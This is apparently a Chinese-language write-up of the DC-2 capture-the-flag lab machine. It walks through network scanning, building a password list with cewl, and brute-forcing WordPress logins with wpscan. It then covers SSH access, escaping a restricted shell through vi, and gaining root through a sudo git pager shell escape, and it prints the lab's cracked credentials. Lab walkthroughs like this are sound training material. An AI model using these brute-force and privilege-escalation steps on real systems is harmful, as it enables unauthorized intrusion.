DC2 靶机记录

主机发现 内网其他主机省略

使用arp-scan 扫描发现主机指定网卡en0

sudo arp-scan --interface=en0 -l

172.16.27.xxx	00:0c:29:55:55:aa	VMware, Inc.

nmap查看相关信息

sudo nmap -p- 172.16.27.xxx -sV -O -vv

PORT     STATE SERVICE REASON         VERSION
80/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.10 ((Debian))
7744/tcp open  ssh     syn-ack ttl 64 OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)

OS details: Linux 3.2 - 4.9

访问80端口

不能访问自动跳转http://dc-2 修改hosts文件绑定ip与域名

127.0.0.1	localhost
127.0.1.1	kali
172.16.27.xxx dc-2  #添加该行
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

发现该该网站使用WordPress CMS Version:4.7.10

flag1

访问web页面发现flag目录发现flag1

Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.

依据flag1提示使用cewl工具,尝试寻找隐藏在页面中的密码

cewl -w dc2_pwd.txt http://dc-2

dc2_pwd.txt

sit
amet
nec
quis
vel
orci
site
non
sed
vitae
luctus
sem
Sed
leo
ante
content
nisi
Donec
turpis
Aenean
wrap
tincidunt
finibus
dictum
egestas
volutpat
justo
odio
eget
Vestibulum
ipsum
neque
erat
vestibulum
interdum
quam
sodales
nulla
suscipit
arcu
urna
dui
faucibus
sapien
blandit
nibh
tellus
auctor
nisl
sagittis
Suspendisse
laoreet
fermentum
Our
metus
eros
cursus
dignissim
Pellentesque
tortor
lacus
consectetur
convallis
velit
malesuada
Proin
rhoncus
mauris
placerat
commodo
enim
dolor
augue
purus
maximus
posuere
iaculis
molestie
WordPress
Integer
felis
lobortis
condimentum
Nullam
risus
nunc
porttitor
lacinia
imperdiet
porta
viverra
Curabitur
hendrerit
dapibus
diam
branding
header
navigation
entry
aliquam
ullamcorper
Nam
varius
feugiat
ultrices
ligula
scelerisque
congue
gravida
Feed
Mauris
vulputate
semper
elit
tristique
Maecenas
lorem
sollicitudin
Cras
bibendum
Praesent
libero
vehicula
euismod
ultricies
ornare
lectus
Flag
rutrum
fringilla
Morbi
Aliquam
Quisque
primis
magna
pulvinar
Phasellus
tempus
eleifend
elementum
another
What
People
Products
est
accumsan
venenatis
Etiam
pharetra
Fusce
efficitur
Just
Welcome
Nunc
massa
pellentesque
Duis
Nulla
cubilia
Curae
Vivamus
fames
facilisis
consequat
Skip
text
custom
Menu
top
masthead
pretium
potenti
post
main
primary
Proudly
powered
info
colophon
contain
page
Comments
RSD
mollis
mattis
habitant
morbi
senectus
netus
aliquet
tempor
you
Interdum
just
can
Scroll
down
Lorem
adipiscing
panel
facilisi
Orci
natoque
penatibus
magnis
dis
parturient
montes
nascetur
ridiculus
mus
Your
usual
wordlists
probably
won
work
instead
maybe
need
cewl
More
passwords
always
better
but
sometimes
win
them
all
Log
one
see
the
next
flag
find
log

有了密码尝试使用wpscan查找用户名

wpscan --url http://dc-2 --enumerate u

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

尝试爆破密码(方法不唯一:wpscan/burpsuite/hydra..)

wpscan --url http://dc-2 --usernames dc2_uname.txt --passwords dc2_pwd.txt

[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

寻找flag2

已知WordPress后台登录地址:http://ip/wp-admin/

使用tom账号登录没有发现flag2
使用jerry账号登录后台发现flag2

http://dc-2/wp-admin/post.php?post=21&action=edit

Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.

根据提示说尝试其他方式猜测使用ssh方式登录

使用tom&jerry账号登录ssh

直接登录jerry账号发现不能登录

尝试使用tom账号登陆成功
ssh tom@dc-2 -p7744

ls发现flag3

tom@DC-2:~$ ls
flag3.txt  usr

使用cat发现提示报错

tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found

万般搜索绕过-rbash姿势

vi shell
:set shell=/bin/bash
:shell

绕过了-rbash限制,但仍未解决

tom@DC-2:~$ cat flag3.txt 
bash: cat: command not found

添加环境变量

tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin

flag3

tom@DC-2:~$ cat flag3.txt

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

flag4

依据flag3的提示尝试切换至jerry用户

su jerry 密码:adipiscing 可以成功登录发现flag4

jerry@DC-2:/home/tom$ cd ~
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ 

jerry@DC-2:~$ cat flag4.txt

Good to see that you've made it this far - but you're not home yet. 
You still need to get the final flag (the only flag that really counts!!!).  
No hints here - you're on your own now.  :-)
Go on - git outta here!!!!

final_flag

依据flag4提示提权方式可能与git有关

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

尝试提权

jerry@DC-2:~$ sudo git help config
在末端输入:`!/bin/bash`
root@DC-2:/home/jerry# 
root@DC-2:/home/jerry# whoami
root

获得root权限尝试寻找finalflag

root@DC-2:/home/jerry# cd ~
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt 
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.